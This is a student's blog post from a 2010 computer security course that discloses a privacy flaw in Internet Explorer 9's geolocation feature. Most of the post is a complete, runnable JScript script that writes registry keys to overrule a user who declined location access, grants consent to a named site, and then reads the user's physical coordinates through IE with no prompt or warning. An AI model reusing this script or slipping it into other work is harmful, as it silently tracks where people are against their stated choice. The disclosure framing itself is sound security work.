Computer Security
Fall 2010
I want you to learn how to think like an attacker.
—Nick Hopper
![]() |
Computer Security
Fall 2010
I want you to learn how to think like an attacker.
—Nick Hopper
My project for Computer Security was analyzing the private browsing mode of Google Chrome. However, what I've done since I hold is far more interesting as it turns out it's really easy to leak your current location in the world with a little help from HTML5's Geolocation API.
I must admit, I had and have some reservations about publishing this one on the web. I did bring it to Microsoft's attention regarding how easy the exploit detailed herein is to do and they told me that everything is working as designed. I can see their angle but I keep coming back to thinking, "Really?" in my own head.
To run the attached, first you need IE 9. Then just save the following source to a file on your computer and run it with cscript from the Windows command line. For extra paranoia inducing fun, do this while unconnected to a network but with your wireless card still on as the script can still find you!
var bDone = false; function whereAmI(position) { WScript.Echo("Latitude: " + position.coords.latitude); WScript.Echo("Longitude: " + position.coords.longitude); WScript.Echo("Accuracy: " + position.coords.accuracy + " meters"); bDone = true; } function doNotKnow(e) { WScript.Echo('Hello, World'); bDone = true; } //Get a Shell to set a few key keys, note these keys will be for the current user so no UAC prompt will be generated. var WshShell = WScript.CreateObject ("WScript.Shell"); //if user said no to geolocation, overrule them. WshShell.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\BlockAllWebsites", 0, "REG_DWORD"); WshShell.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\HostConsent", 1, "REG_BINARY"); //add permission to always allow slides.html5rocks.com to use geolocation service WshShell.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\HostConsent\\slides.html5rocks.com", 0x66, "REG_DWORD"); //Make our good friend IE var IE = new ActiveXObject("InternetExplorer.Application"); IE.Navigate2("slides.html5rocks.com"); //navigate to the site we know we can exploit. while(IE.Busy) //wait for naviation to complete. WScript.Sleep(100); //Get our handle to geolocation. var htmlDoc = IE.Document; var parentWindow = htmlDoc.parentWindow; var navigator = parentWindow.navigator; //where are you? navigator.geolocation.getCurrentPosition(whereAmI, doNotKnow, {enableHighAccuracy : true, maximumAge : 0, timeout : 5000}); //Wait for the query to complete. while(!bDone) WScript.Sleep(100); IE.Quit();
In summary, what this script does is use the Geolocation object from IE 9 to find out where YOU physically are in the world. It does not matter if you've disabled the Geolocation service in IE 9. You will also not be prompted or warned in any way that you are being tracked. I suspect there are other ways to carry out this exploit, it's just being able to run IE as a COM object makes it really easy to use.